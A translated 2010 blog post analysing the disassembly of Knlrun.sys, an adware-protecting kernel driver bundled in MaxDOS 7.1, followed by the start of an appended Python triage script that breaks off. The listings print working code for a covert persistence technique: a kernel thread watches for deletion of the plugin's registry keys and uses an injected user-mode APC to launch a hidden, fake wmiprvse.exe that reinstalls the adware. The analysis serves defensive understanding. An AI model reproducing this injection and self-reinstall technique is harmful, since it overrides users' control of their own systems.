Posted on 2010-08-22 21:50 by Jerson Ju
My laptop served for four years and has finally retired with honour. This morning I booted the new laptop and got a blue screen. I pulled the minidump out of the system directory, and WinDbg analysis showed that a driver called Knlrun.sys was responsible. A Baidu search for Knlrun shows it is the driver of a Sogou adware plugin, bundled into MaxDOS. On the old machine I always used MaxDOS 5.x, which was excellent; the new machine got MaxDOS 7.1 and was hit. Infuriating. A nuisance plugin is one thing, but you cannot go blue-screening the machine. And to MaxDOS: you are shareware, we use you for free and we are grateful for it, but you should at least give us a checkbox in the installer so the user can choose whether or not to install the extra, shouldn't you?

Now to the point. Let's analyse its driver file:

```asm
INIT:00011885 DriverEntry proc near ; driver entry function
INIT:00011885
INIT:00011885 DriverObject = dword ptr 8
INIT:00011885 RegistryPath = dword ptr 0Ch
INIT:00011885
INIT:00011885 mov edi, edi
INIT:00011887 push ebp
INIT:00011888 mov ebp, esp
INIT:0001188A mov eax, dword_11324
INIT:0001188F test eax, eax
INIT:00011891 mov ecx, 0BB40h ; 0BB40h is the default 32-bit /GS cookie: this block is the compiler's security-cookie setup
INIT:00011896 jz short loc_1189C
INIT:00011898 cmp eax, ecx
INIT:0001189A jnz short loc_118BF
INIT:0001189C
INIT:0001189C loc_1189C: ; CODE XREF: DriverEntry+11j
INIT:0001189C mov edx, ds:KeTickCount
INIT:000118A2 mov eax, offset dword_11324
INIT:000118A7 shr eax, 8
INIT:000118AA xor eax, [edx]
INIT:000118AC and eax, 0FFFFh
INIT:000118B1 mov dword_11324, eax
INIT:000118B6 jnz short loc_118BF
INIT:000118B8 mov eax, ecx
INIT:000118BA mov dword_11324, eax
INIT:000118BF
INIT:000118BF loc_118BF: ; CODE XREF: DriverEntry+15j
INIT:000118BF ; DriverEntry+31j
INIT:000118BF not eax
INIT:000118C1 mov dword_11320, eax
INIT:000118C6 pop ebp
INIT:000118C7 jmp RealDriverEntry ; everything above is just tick-count fiddling, ignore it; this is the real entry function, let's step into it
INIT:000118C7 DriverEntry endp
```
The RealDriverEntry function:

```asm
.text:00010AD4 ; int __stdcall RealDriverEntry(PDRIVER_OBJECT DriverObject, int)
.text:00010AD4 RealDriverEntry proc near ; CODE XREF: DriverEntry+42j
.text:00010AD4
.text:00010AD4 SymbolicLinkName= UNICODE_STRING ptr -18h
.text:00010AD4 DestinationString= UNICODE_STRING ptr -10h
.text:00010AD4 Handle = dword ptr -8
.text:00010AD4 DeviceObject = dword ptr -4
.text:00010AD4 DriverObject = dword ptr 8
.text:00010AD4
.text:00010AD4 mov edi, edi
.text:00010AD6 push ebp
.text:00010AD7 mov ebp, esp
.text:00010AD9 sub esp, 18h
.text:00010ADC push ebx
.text:00010ADD push esi
.text:00010ADE push edi
.text:00010ADF xor esi, esi
.text:00010AE1 push offset UnicodeString
.text:00010AE6 mov [ebp+DeviceObject], esi
.text:00010AE9 call sub_105DC ; sub_105DC is GetCurrentUserSID (see its listing below; its xref is RealDriverEntry+15)
.text:00010AEE mov edi, ds:RtlInitUnicodeString
.text:00010AF4 push offset aDeviceKnlrun ; "\\Device\\KnlRun"
.text:00010AF9 lea eax, [ebp+DestinationString]
.text:00010AFC push eax ; DestinationString
.text:00010AFD call edi ; RtlInitUnicodeString
.text:00010AFF mov ebx, [ebp+DriverObject]
.text:00010B02 lea eax, [ebp+DeviceObject]
.text:00010B05 push eax ; DeviceObject
.text:00010B06 push esi ; Exclusive
.text:00010B07 push 100h ; DeviceCharacteristics = FILE_DEVICE_SECURE_OPEN
.text:00010B0C push 22h ; DeviceType = FILE_DEVICE_UNKNOWN
.text:00010B0E lea eax, [ebp+DestinationString]
.text:00010B11 push eax ; DeviceName
.text:00010B12 push esi ; DeviceExtensionSize
.text:00010B13 push ebx ; DriverObject
.text:00010B14 call ds:IoCreateDevice
.text:00010B1A push offset aDosdevicesKnlr ; "\\DosDevices\\KnlRun"
.text:00010B1F lea eax, [ebp+SymbolicLinkName]
.text:00010B22 push eax ; DestinationString
.text:00010B23 call edi ; RtlInitUnicodeString
.text:00010B25 lea eax, [ebp+DestinationString]
.text:00010B28 push eax ; DeviceName
.text:00010B29 lea eax, [ebp+SymbolicLinkName]
.text:00010B2C push eax ; SymbolicLinkName
.text:00010B2D call ds:IoCreateSymbolicLink
.text:00010B33 push 1Ch ; 1Ch = IRP_MJ_MAXIMUM_FUNCTION+1 entries
.text:00010B35 pop ecx
.text:00010B36 mov eax, offset sub_10A6E
.text:00010B3B lea edi, [ebx+38h] ; DriverObject->MajorFunction[]: every IRP handler set to sub_10A6E
.text:00010B3E rep stosd
.text:00010B40 mov eax, [ebp+DeviceObject]
.text:00010B43 mov dword ptr [ebx+34h], offset unload_driver ; DriverObject->DriverUnload
.text:00010B4A or dword ptr [eax+1Ch], 4 ; DeviceObject->Flags |= DO_BUFFERED_IO
.text:00010B4E push offset NotifyRoutine ; NotifyRoutine
.text:00010B53 call PsSetLoadImageNotifyRoutine
.text:00010B58 push esi ; State
.text:00010B59 push 1 ; Type
.text:00010B5B push offset Event ; Event
.text:00010B60 call ds:KeInitializeEvent
.text:00010B66 push esi ; StartContext
.text:00010B67 push offset StartRoutine ; StartRoutine
.text:00010B6C push esi ; ClientId
.text:00010B6D push esi ; ProcessHandle
.text:00010B6E push esi ; ObjectAttributes
.text:00010B6F mov edi, 1F03FFh ; THREAD_ALL_ACCESS
.text:00010B74 push edi ; DesiredAccess
.text:00010B75 lea eax, [ebp+Handle]
.text:00010B78 push eax ; ThreadHandle
.text:00010B79 call ds:PsCreateSystemThread
.text:00010B7F test eax, eax
.text:00010B81 jnz short loc_10B9E
.text:00010B83 push esi ; HandleInformation
.text:00010B84 push offset Object ; Object
.text:00010B89 push esi ; AccessMode
.text:00010B8A push esi ; ObjectType
.text:00010B8B push edi ; DesiredAccess
.text:00010B8C push [ebp+Handle] ; Handle
.text:00010B8F call ds:ObReferenceObjectByHandle ; keeps a thread object pointer (Object) so unload can wait on the thread
.text:00010B95 push [ebp+Handle] ; Handle
.text:00010B98 call ds:ZwClose
.text:00010B9E
.text:00010B9E loc_10B9E: ; CODE XREF: RealDriverEntry+ADj
.text:00010B9E pop edi
.text:00010B9F pop esi
.text:00010BA0 xor eax, eax
.text:00010BA2 pop ebx
.text:00010BA3 leave
.text:00010BA4 retn 8
.text:00010BA4 RealDriverEntry endp
```
Only two functions here matter; the rest is boilerplate. PsSetLoadImageNotifyRoutine: every time the system loads a module it calls back into the routine registered here. PsCreateSystemThread: creates a kernel thread, and all the dirty work happens inside it.

First, NotifyRoutine, the callback registered with PsSetLoadImageNotifyRoutine:

```asm
.text:000108E4 ; void __stdcall NotifyRoutine(int FullName, int hHandle, int ImageInfo)
.text:000108E4 NotifyRoutine proc near ; DATA XREF: unload_driver+7o
.text:000108E4 ; RealDriverEntry+7Ao
.text:000108E4
.text:000108E4 ImageInfo = dword ptr 10h
.text:000108E4
.text:000108E4 mov edi, edi
.text:000108E6 push ebp
.text:000108E7 mov ebp, esp
.text:000108E9 cmp dwCreateProcessA, 0 ; already resolved? then do nothing on later image loads
.text:000108F0 jnz short loc_1090B
.text:000108F2 mov eax, [ebp+ImageInfo]
.text:000108F5 push offset aCreateprocessa ; "CreateProcessA"
.text:000108FA push dword ptr [eax+4] ; ImageBase (IMAGE_INFO.ImageBase)
.text:000108FD call IatHook
.text:00010902 test eax, eax
.text:00010904 jz short loc_1090B
.text:00010906 mov dwCreateProcessA, eax ; user-mode address of CreateProcessA, used later by the APC stub
.text:0001090B
.text:0001090B loc_1090B: ; CODE XREF: NotifyRoutine+Cj
.text:0001090B ; NotifyRoutine+20j
.text:0001090B pop ebp
.text:0001090C retn 0Ch
.text:0001090C NotifyRoutine endp
```
The main job of this routine is to walk the loaded module's export table and obtain the address of the CreateProcessA system API.
Moving on. StartRoutine, the kernel thread function created by PsCreateSystemThread:

```asm
.text:00010922 ; void __stdcall StartRoutine(PVOID)
.text:00010922 StartRoutine proc near ; DATA XREF: RealDriverEntry+93o
.text:00010922
.text:00010922 Timeout = LARGE_INTEGER ptr -8
.text:00010922
.text:00010922 mov edi, edi
.text:00010924 push ebp
.text:00010925 mov ebp, esp
.text:00010927 push ecx
.text:00010928 push ecx
.text:00010929 push esi
.text:0001092A push edi
.text:0001092B xor esi, esi
.text:0001092D xor eax, eax
.text:0001092F lea edi, [ebp+Timeout.HighPart]
.text:00010932 mov [ebp+Timeout.LowPart], esi
.text:00010935 stosd
.text:00010936
.text:00010936 loc_10936: ; CODE XREF: StartRoutine+74j
.text:00010936 cmp dwCreateProcessA, esi ; nothing to do until NotifyRoutine has resolved CreateProcessA
.text:0001093C jz short loc_10974
.text:0001093E cmp UnicodeString.Buffer, esi
.text:00010944 jnz short loc_10958
.text:00010946 push offset UnicodeString
.text:0001094B call GetCurrentUserSID
.text:00010950 cmp UnicodeString.Buffer, esi
.text:00010956 jz short loc_10974
.text:00010958
.text:00010958 loc_10958: ; CODE XREF: StartRoutine+22j
.text:00010958 call ExistsHboRegKey
.text:0001095D test al, al
.text:0001095F jz short loc_1096A ; plugin keys missing -> relaunch the installer
.text:00010961 call sub_10666
.text:00010966 test al, al
.text:00010968 jz short loc_10974
.text:0001096A
.text:0001096A loc_1096A: ; CODE XREF: StartRoutine+3Dj
.text:0001096A push offset strwmiprvse
.text:0001096F call apcCreateWmiprvse_0
.text:00010974
.text:00010974 loc_10974: ; CODE XREF: StartRoutine+1Aj
.text:00010974 ; StartRoutine+34j ...
.text:00010974 or [ebp+Timeout.HighPart], 0FFFFFFFFh
.text:00010978 lea eax, [ebp+Timeout]
.text:0001097B push eax ; Timeout
.text:0001097C push esi ; Alertable
.text:0001097D push esi ; WaitMode
.text:0001097E push esi ; WaitReason
.text:0001097F push offset Event ; Object
.text:00010984 mov [ebp+Timeout.LowPart], 0FE363C80h ; Timeout = 0FFFFFFFFFE363C80h = -30,000,000 x 100 ns: a 3-second relative wait
.text:0001098B call ds:KeWaitForSingleObject
.text:00010991 cmp eax, 102h ; STATUS_TIMEOUT: loop again; any other result means Event was signalled (unload)
.text:00010996 jz short loc_10936
.text:00010998 push esi ; ExitStatus
.text:00010999 call ds:PsTerminateSystemThread
.text:0001099F pop edi
.text:000109A0 pop esi
.text:000109A1 leave
.text:000109A2 retn 4
.text:000109A2 StartRoutine endp
```
There are three key functions inside it:

GetCurrentUserSID: obtains the SID of the current user (it needs it because it operates on keys under \\registry\\user\\).

ExistsHboRegKey: opens the adware plugin's registry key; a COM component must have its keys present in the registry.

apcCreateWmiprvse_0: starts the user-mode Wmiprvse.exe process from kernel mode (this is not Microsoft's program; it is one Sogou forged with the same name as Microsoft's).
The GetCurrentUserSID function:

```asm
.text:000105DC GetCurrentUserSID proc near ; CODE XREF: StartRoutine+29p
.text:000105DC ; RealDriverEntry+15p
.text:000105DC
.text:000105DC var_18 = byte ptr -18h
.text:000105DC arg_0 = dword ptr 8
.text:000105DC
.text:000105DC mov edi, edi
.text:000105DE push ebp
.text:000105DF mov ebp, esp
.text:000105E1 sub esp, 18h
.text:000105E4 call ds:IoGetCurrentProcess
.text:000105EA test eax, eax
.text:000105EC jz short locret_1065D
.text:000105EE push ebx
.text:000105EF lea ebx, [eax+88h] ; EPROCESS.ActiveProcessLinks (hardcoded Windows XP offsets throughout this routine)
.text:000105F5 cmp [ebx], ebx
.text:000105F7 jz short loc_1065C
.text:000105F9 push edi
.text:000105FA mov edi, [ebx]
.text:000105FC cmp edi, ebx
.text:000105FE jz short loc_1065B
.text:00010600 push esi
.text:00010601
.text:00010601 loc_10601: ; CODE XREF: GetCurrentUserSID+5Dj
.text:00010601 lea esi, [edi-88h] ; LIST_ENTRY -> containing EPROCESS
.text:00010607 cmp dword ptr [esi+1A0h], 0 ; EPROCESS.ActiveThreads
.text:0001060E jz short loc_10635
.text:00010610 lea eax, [esi+190h] ; EPROCESS.ThreadListHead must be non-empty
.text:00010616 cmp [eax], eax
.text:00010618 jz short loc_10635
.text:0001061A push 0Ch ; size_t
.text:0001061C lea eax, [esi+174h] ; EPROCESS.ImageFileName
.text:00010622 push offset aExplorer_exe ; "explorer.exe"
.text:00010627 push eax ; char *
.text:00010628 call ds:_strnicmp
.text:0001062E add esp, 0Ch
.text:00010631 test eax, eax
.text:00010633 jz short loc_1063D
.text:00010635
.text:00010635 loc_10635: ; CODE XREF: GetCurrentUserSID+32j
.text:00010635 ; GetCurrentUserSID+3Cj
.text:00010635 mov edi, [edi] ; next process in the active-process list
.text:00010637 cmp edi, ebx
.text:00010639 jnz short loc_10601
.text:0001063B jmp short loc_1065A
.text:0001063D ; ---------------------------------------------------------------------------
.text:0001063D
.text:0001063D loc_1063D: ; CODE XREF: GetCurrentUserSID+57j
.text:0001063D lea eax, [ebp+var_18]
.text:00010640 push eax
.text:00010641 push esi
.text:00010642 call ds:KeStackAttachProcess ; attach to explorer.exe's address space
.text:00010648 push [ebp+arg_0]
.text:0001064B call sub_10486 ; fills the caller's UnicodeString with the user's SID
.text:00010650 lea eax, [ebp+var_18]
.text:00010653 push eax
.text:00010654 call ds:KeUnstackDetachProcess
.text:0001065A
.text:0001065A loc_1065A: ; CODE XREF: GetCurrentUserSID+5Fj
.text:0001065A pop esi
.text:0001065B
.text:0001065B loc_1065B: ; CODE XREF: GetCurrentUserSID+22j
.text:0001065B pop edi
.text:0001065C
.text:0001065C loc_1065C: ; CODE XREF: GetCurrentUserSID+1Bj
.text:0001065C pop ebx
.text:0001065D
.text:0001065D locret_1065D: ; CODE XREF: GetCurrentUserSID+10j
.text:0001065D leave
.text:0001065E retn 4
.text:0001065E GetCurrentUserSID endp
```
The ExistsHboRegKey code:

```asm
.text:000106FC ExistsHboRegKey proc near ; CODE XREF: StartRoutine:loc_10958p
.text:000106FC
.text:000106FC ObjectAttributes= OBJECT_ATTRIBUTES ptr -430h
.text:000106FC DestinationString= UNICODE_STRING ptr -418h
.text:000106FC var_410 = dword ptr -410h
.text:000106FC Handle = dword ptr -40Ch
.text:000106FC var_408 = dword ptr -408h
.text:000106FC SourceString = word ptr -404h
.text:000106FC var_3E6 = byte ptr -3E6h
.text:000106FC var_4 = dword ptr -4
.text:000106FC
.text:000106FC mov edi, edi
.text:000106FE push ebp
.text:000106FF mov ebp, esp
.text:00010701 sub esp, 430h
.text:00010707 mov eax, dword_11324 ; save the /GS cookie in var_4
.text:0001070C push ebx
.text:0001070D mov ebx, ds:wcslen
.text:00010713 mov [ebp+var_4], eax
.text:00010716 mov eax, offset off_11310 ; first table: key-name suffixes appended to the user's SID path
.text:0001071B push esi
.text:0001071C push edi
.text:0001071D mov [ebp+var_408], eax
.text:00010723 mov [ebp+var_410], eax
.text:00010729
.text:00010729 loc_10729: ; CODE XREF: ExistsHboRegKey+13Fj
.text:00010729 xor eax, eax
.text:0001072B mov ecx, 100h
.text:00010730 lea edi, [ebp+SourceString]
.text:00010736 rep stosd
.text:00010738 lea eax, [ebp+SourceString]
.text:0001073E push eax ; SourceString
.text:0001073F lea eax, [ebp+DestinationString]
.text:00010745 push eax ; DestinationString
.text:00010746 call ds:RtlInitUnicodeString
.text:0001074C push 7
.text:0001074E pop ecx
.text:0001074F mov esi, offset word_106D6 ; fixed prefix (7 dwords + 1 word = 1Eh bytes)
.text:00010754 lea edi, [ebp+SourceString]
.text:0001075A rep movsd
.text:0001075C movzx ecx, UnicodeString.Length
.text:00010763 mov eax, ecx
.text:00010765 movsw
.text:00010767 mov esi, UnicodeString.Buffer ; then the SID string from GetCurrentUserSID
.text:0001076D shr ecx, 2
.text:00010770 lea edi, [ebp+var_3E6]
.text:00010776 rep movsd
.text:00010778 mov ecx, eax
.text:0001077A mov eax, [ebp+var_408]
.text:00010780 and ecx, 3
.text:00010783 rep movsb
.text:00010785 mov esi, [eax]
.text:00010787 push esi ; wchar_t *
.text:00010788 mov [ebp+var_408], esi
.text:0001078E call ebx ; wcslen
.text:00010790 movzx edi, UnicodeString.Length
.text:00010797 push [ebp+var_408] ; wchar_t *
.text:0001079D mov ecx, eax
.text:0001079F shl ecx, 1
.text:000107A1 mov eax, ecx
.text:000107A3 shr ecx, 2
.text:000107A6 lea edi, [ebp+edi+var_3E6] ; then the table entry (sub-key name)
.text:000107AD rep movsd
.text:000107AF mov ecx, eax
.text:000107B1 and ecx, 3
.text:000107B4 rep movsb
.text:000107B6 call ebx ; wcslen
.text:000107B8 mov esi, ds:ZwOpenKey
.text:000107BE pop ecx
.text:000107BF pop ecx
.text:000107C0 mov ecx, dword ptr UnicodeString.Length
.text:000107C6 lea eax, [ecx+eax*2+1Eh] ; Length = prefix + SID + suffix
.text:000107CA mov [ebp+DestinationString.Length], ax
.text:000107D1 xor eax, eax
.text:000107D3 mov [ebp+ObjectAttributes.RootDirectory], eax
.text:000107D9 mov [ebp+ObjectAttributes.SecurityDescriptor], eax
.text:000107DF mov [ebp+ObjectAttributes.SecurityQualityOfService], eax
.text:000107E5 lea eax, [ebp+ObjectAttributes]
.text:000107EB push eax ; ObjectAttributes
.text:000107EC mov edi, 20019h ; KEY_READ
.text:000107F1 push edi ; DesiredAccess
.text:000107F2 lea eax, [ebp+Handle]
.text:000107F8 lea ecx, [ebp+DestinationString]
.text:000107FE push eax ; KeyHandle
.text:000107FF mov [ebp+ObjectAttributes.Length], 18h
.text:00010809 mov [ebp+ObjectAttributes.Attributes], 40h ; OBJ_CASE_INSENSITIVE
.text:00010813 mov [ebp+ObjectAttributes.ObjectName], ecx
.text:00010819 call esi ; ZwOpenKey
.text:0001081B test eax, eax
.text:0001081D jz loc_108B9 ; key exists -> success path (not shown in this listing)
.text:00010823 mov eax, [ebp+var_410]
.text:00010829 add eax, 4
.text:0001082C cmp dword ptr [eax], 0 ; next table entry, until the NULL terminator
.text:0001082F mov [ebp+var_410], eax
.text:00010835 mov [ebp+var_408], eax
.text:0001083B jnz loc_10729
.text:00010841 mov eax, offset off_11318 ; second table: complete key paths tried as-is
.text:00010846 mov ebx, eax
.text:00010848
.text:00010848 loc_10848: ; CODE XREF: ExistsHboRegKey+1ACj
.text:00010848 push dword ptr [eax] ; SourceString
.text:0001084A lea eax, [ebp+DestinationString]
.text:00010850 push eax ; DestinationString
.text:00010851 call ds:RtlInitUnicodeString
.text:00010857 xor eax, eax
.text:00010859 mov [ebp+ObjectAttributes.RootDirectory], eax
.text:0001085F mov [ebp+ObjectAttributes.SecurityDescriptor], eax
.text:00010865 mov [ebp+ObjectAttributes.SecurityQualityOfService], eax
.text:0001086B lea eax, [ebp+ObjectAttributes]
.text:00010871 push eax ; ObjectAttributes
.text:00010872 push edi ; DesiredAccess
.text:00010873 lea eax, [ebp+Handle]
.text:00010879 lea ecx, [ebp+DestinationString]
.text:0001087F push eax ; KeyHandle
.text:00010880 mov [ebp+ObjectAttributes.Length], 18h
.text:0001088A mov [ebp+ObjectAttributes.Attributes], 40h
.text:00010894 mov [ebp+ObjectAttributes.ObjectName], ecx
.text:0001089A call esi ; ZwOpenKey
.text:0001089C test eax, eax
.text:0001089E jz short loc_108BD
.text:000108A0 add ebx, 4
.text:000108A3 cmp dword ptr [ebx], 0
.text:000108A6 mov eax, ebx
.text:000108A8 jnz short loc_10848
.text:000108AA xor al, al ; no key found: return FALSE
.text:000108AC
.text:000108AC loc_108AC: ; CODE XREF: ExistsHboRegKey+1D1j
.text:000108AC mov ecx, [ebp+var_4]
.text:000108AF pop edi
.text:000108B0 pop esi
.text:000108B1 pop ebx
.text:000108B2 call sub_10CE9 ; __security_check_cookie(ecx)
.text:000108B7 leave
.text:000108B8 retn
```
apcCreateWmiprvse creates the user-mode process:

```asm
PAGE:000115FE apcCreateWmiprvse proc near ; CODE XREF: apcCreateWmiprvse_0+B0p
PAGE:000115FE
PAGE:000115FE var_34 = byte ptr -34h
PAGE:000115FE P = dword ptr -1Ch
PAGE:000115FE ms_exc = CPPEH_RECORD ptr -18h
PAGE:000115FE arg_0 = dword ptr 8 ; command line ("wmiprvse.exe")
PAGE:000115FE arg_4 = dword ptr 0Ch ; target KTHREAD
PAGE:000115FE arg_8 = dword ptr 10h ; target EPROCESS
PAGE:000115FE
PAGE:000115FE push 24h
PAGE:00011600 push offset stru_11210
PAGE:00011605 call __SEH_prolog
PAGE:0001160A xor esi, esi
PAGE:0001160C cmp [ebp+arg_4], esi
PAGE:0001160F jz loc_1179B
PAGE:00011615 cmp [ebp+arg_8], esi
PAGE:00011618 jz loc_1179B
PAGE:0001161E push 206B6444h ; Tag
PAGE:00011623 push 30h ; NumberOfBytes = sizeof(KAPC)
PAGE:00011625 push esi ; PoolType
PAGE:00011626 call ds:ExAllocatePoolWithTag
PAGE:0001162C mov edi, eax
PAGE:0001162E mov [ebp+P], edi
PAGE:00011631 cmp edi, esi
PAGE:00011633 jz short loc_1165D
PAGE:00011635 mov eax, offset nullsub_1
PAGE:0001163A mov ecx, offset sub_113C8 ; the MDL covers the driver's own stub, sub_113C8 .. nullsub_1
PAGE:0001163F sub eax, ecx
PAGE:00011641 push esi ; Irp
PAGE:00011642 push esi ; ChargeQuota
PAGE:00011643 push esi ; SecondaryBuffer
PAGE:00011644 push eax ; Length
PAGE:00011645 push ecx ; VirtualAddress
PAGE:00011646 call ds:IoAllocateMdl
PAGE:0001164C mov MemoryDescriptorList, eax
PAGE:00011651 cmp eax, esi
PAGE:00011653 jnz short loc_11667
PAGE:00011655 push esi ; Tag
PAGE:00011656 push edi ; P
PAGE:00011657 call ds:ExFreePoolWithTag
PAGE:0001165D
PAGE:0001165D loc_1165D: ; CODE XREF: apcCreateWmiprvse+35j
PAGE:0001165D mov eax, 0C000009Ah ; STATUS_INSUFFICIENT_RESOURCES
PAGE:00011662 jmp loc_117A0
PAGE:00011667 ; ---------------------------------------------------------------------------
PAGE:00011667
PAGE:00011667 loc_11667: ; CODE XREF: apcCreateWmiprvse+55j
PAGE:00011667 mov [ebp+ms_exc.disabled], esi
PAGE:0001166A push 1 ; Operation = IoWriteAccess
PAGE:0001166C push esi ; AccessMode = KernelMode
PAGE:0001166D push eax ; MemoryDescriptorList
PAGE:0001166E call ds:MmProbeAndLockPages
PAGE:00011674 or [ebp+ms_exc.disabled], 0FFFFFFFFh
PAGE:00011678 lea eax, [ebp+var_34]
PAGE:0001167B push eax
PAGE:0001167C push [ebp+arg_8]
PAGE:0001167F call ds:KeStackAttachProcess ; switch into the target process
PAGE:00011685 push 10h ; Priority = NormalPagePriority
PAGE:00011687 push esi ; BugCheckOnFailure
PAGE:00011688 push esi ; BaseAddress
PAGE:00011689 push 1 ; CacheType = MmCached
PAGE:0001168B push 1 ; AccessMode = UserMode: the stub becomes visible in the target's user address space
PAGE:0001168D push MemoryDescriptorList ; MemoryDescriptorList
PAGE:00011693 call ds:MmMapLockedPagesSpecifyCache
PAGE:00011699 mov ebx, eax ; ebx = user-mode address of the stub
PAGE:0001169B cmp ebx, esi
PAGE:0001169D jnz short loc_116BC
PAGE:0001169F lea eax, [ebp+var_34]
PAGE:000116A2 push eax
PAGE:000116A3 call ds:KeUnstackDetachProcess
PAGE:000116A9 push MemoryDescriptorList ; Mdl
PAGE:000116AF call ds:IoFreeMdl
PAGE:000116B5 push esi
PAGE:000116B6 push edi
PAGE:000116B7 jmp loc_1176D
PAGE:000116BC ; ---------------------------------------------------------------------------
PAGE:000116BC
PAGE:000116BC loc_116BC: ; CODE XREF: apcCreateWmiprvse+9Fj
PAGE:000116BC lea edx, [ebx+29h] ; edx = STARTUPINFOA embedded in the stub
PAGE:000116BF push 4Bh
PAGE:000116C1 pop ecx
PAGE:000116C2 xor eax, eax
PAGE:000116C4 mov edi, edx
PAGE:000116C6 rep stosd
PAGE:000116C8 mov esi, [ebp+arg_0]
PAGE:000116CB lea edi, [esi+1]
PAGE:000116CE
PAGE:000116CE loc_116CE: ; CODE XREF: apcCreateWmiprvse+D5j
PAGE:000116CE mov al, [esi] ; strlen(arg_0)
PAGE:000116D0 inc esi
PAGE:000116D1 test al, al
PAGE:000116D3 jnz short loc_116CE
PAGE:000116D5 sub esi, edi
PAGE:000116D7 mov ecx, esi
PAGE:000116D9 lea edi, [ebx+7Dh]
PAGE:000116DC mov esi, [ebp+arg_0] ; "wmiprvse.exe"
PAGE:000116DF mov eax, ecx
PAGE:000116E1 shr ecx, 2
PAGE:000116E4 rep movsd
PAGE:000116E6 mov ecx, eax
PAGE:000116E8 and ecx, 3 ; these ten or so lines assemble the machine code that creates the process
PAGE:000116EB rep movsb
PAGE:000116ED mov eax, dwCreateProcessA
PAGE:000116F2 mov [ebx+1], eax ; patch the CreateProcessA address into the stub
PAGE:000116F5 mov dword ptr [edx], 44h ; STARTUPINFOA.cb
PAGE:000116FB xor edi, edi
PAGE:000116FD inc edi
PAGE:000116FE mov [edx+2Ch], edi ; dwFlags = STARTF_USESHOWWINDOW
PAGE:00011701 xor esi, esi
PAGE:00011703 mov [edx+30h], si ; wShowWindow = SW_HIDE: the new process gets no window
PAGE:00011707 mov [ebx+0Bh], edx ; lpStartupInfo
PAGE:0001170A lea eax, [ebx+6Dh]
PAGE:0001170D mov [ebx+6], eax ; lpProcessInformation
PAGE:00011710 lea eax, [ebx+7Dh]
PAGE:00011713 mov [ebx+1Ch], eax ; lpCommandLine
PAGE:00011716 lea eax, [ebp+var_34]
PAGE:00011719 push eax
PAGE:0001171A call ds:KeUnstackDetachProcess
PAGE:00011720 mov eax, [ebp+arg_4]
PAGE:00011723 cmp byte ptr [eax+4Ah], 0 ; KTHREAD.ApcState.UserApcPending (XP offset)
PAGE:00011727 jnz short loc_1172D
PAGE:00011729 mov byte ptr [eax+4Ah], 1 ; force the thread to deliver user APCs on its next return to user mode
PAGE:0001172D
PAGE:0001172D loc_1172D: ; CODE XREF: apcCreateWmiprvse+129j
PAGE:0001172D push esi ; NormalContext = 0
PAGE:0001172E push edi ; ApcMode = UserMode
PAGE:0001172F push ebx ; NormalRoutine = mapped stub
PAGE:00011730 push esi ; RundownRoutine = 0
PAGE:00011731 push offset FreePoolMem ; KernelRoutine
PAGE:00011736 push esi ; Environment = OriginalApcEnvironment
PAGE:00011737 push eax ; Thread
PAGE:00011738 push [ebp+P] ; Apc
PAGE:0001173B call ds:KeInitializeApc
PAGE:00011741 push esi
PAGE:00011742 push esi
PAGE:00011743 push esi
PAGE:00011744 push [ebp+P]
PAGE:00011747 call ds:KeInsertQueueApc ; queue it; the stub runs in the target thread in user mode
PAGE:0001174D test al, al
PAGE:0001174F jnz short loc_11775
PAGE:00011751 push MemoryDescriptorList ; MemoryDescriptorList
PAGE:00011757 call ds:MmUnlockPages
PAGE:0001175D push MemoryDescriptorList ; Mdl
PAGE:00011763 call ds:IoFreeMdl
PAGE:00011769 push esi ; Tag
PAGE:0001176A push [ebp+P] ; P
PAGE:0001176D
PAGE:0001176D loc_1176D: ; CODE XREF: apcCreateWmiprvse+B9j
PAGE:0001176D call ds:ExFreePoolWithTag
PAGE:00011773 jmp short loc_1179B
PAGE:00011775 ; ---------------------------------------------------------------------------
PAGE:00011775
PAGE:00011775 loc_11775: ; CODE XREF: apcCreateWmiprvse+151j
PAGE:00011775 xor eax, eax ; STATUS_SUCCESS
PAGE:00011777 jmp short loc_117A0
PAGE:00011779 ; ---------------------------------------------------------------------------
PAGE:00011779
PAGE:00011779 loc_11779: ; DATA XREF: .rdata:stru_11210o
PAGE:00011779 xor eax, eax ; SEH filter: EXCEPTION_EXECUTE_HANDLER
PAGE:0001177B inc eax
PAGE:0001177C retn
PAGE:0001177D ; ---------------------------------------------------------------------------
PAGE:0001177D
PAGE:0001177D loc_1177D: ; DATA XREF: .rdata:stru_11210o
PAGE:0001177D mov esp, [ebp+ms_exc.old_esp] ; SEH handler for a failed MmProbeAndLockPages
PAGE:00011780 push MemoryDescriptorList ; Mdl
PAGE:00011786 call ds:IoFreeMdl
PAGE:0001178C push 0 ; Tag
PAGE:0001178E push [ebp+P] ; P
PAGE:00011791 call ds:ExFreePoolWithTag
PAGE:00011797 or [ebp+ms_exc.disabled], 0FFFFFFFFh
PAGE:0001179B
PAGE:0001179B loc_1179B: ; CODE XREF: apcCreateWmiprvse+11j
PAGE:0001179B ; apcCreateWmiprvse+1Aj ...
PAGE:0001179B mov eax, 0C0000001h ; STATUS_UNSUCCESSFUL
PAGE:000117A0
PAGE:000117A0 loc_117A0: ; CODE XREF: apcCreateWmiprvse+64j
PAGE:000117A0 ; apcCreateWmiprvse+179j
PAGE:000117A0 call __SEH_epilog
PAGE:000117A5 retn 0Ch
PAGE:000117A5 apcCreateWmiprvse endp
```
Summary: the purpose of this driver is to protect the adware plugin and stop us from removing it. As soon as it detects that we have deleted the plugin, the driver launches the user-mode Wmiprvse.exe (a forged program with the same name as a Microsoft service) from kernel mode to reinstall the plugin.
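As an added example (not part of the original post), a small Python triage script for listings like the ones above: it re-splits an IDA listing that a web page flattened onto one line, pulls out the kernel API call targets, maps them to the behaviours identified in this analysis (image-load callback, polling thread, MDL remap into a user process, user-mode APC, registry probe), and decodes StartRoutine's relative KeWaitForSingleObject timeout. The sample listing is constructed from a handful of instructions copied from the post; the behaviour labels are this editor's, not the post's.

```python
import re

# Constructed sample: instructions copied from the post's listings, flattened onto
# one line the way the blog page renders them.
SAMPLE = (
    ".text:00010B53 call PsSetLoadImageNotifyRoutine "
    ".text:00010B79 call ds:PsCreateSystemThread "
    ".text:00010974 or [ebp+Timeout.HighPart], 0FFFFFFFFh "
    ".text:00010984 mov [ebp+Timeout.LowPart], 0FE363C80h "
    ".text:00010819 call esi ; ZwOpenKey "
    "PAGE:0001166E call ds:MmProbeAndLockPages "
    "PAGE:00011693 call ds:MmMapLockedPagesSpecifyCache "
    "PAGE:0001173B call ds:KeInitializeApc "
    "PAGE:00011747 call ds:KeInsertQueueApc"
)

# An IDA line starts with "<segment>:<8 hex digits>"; split just before each one.
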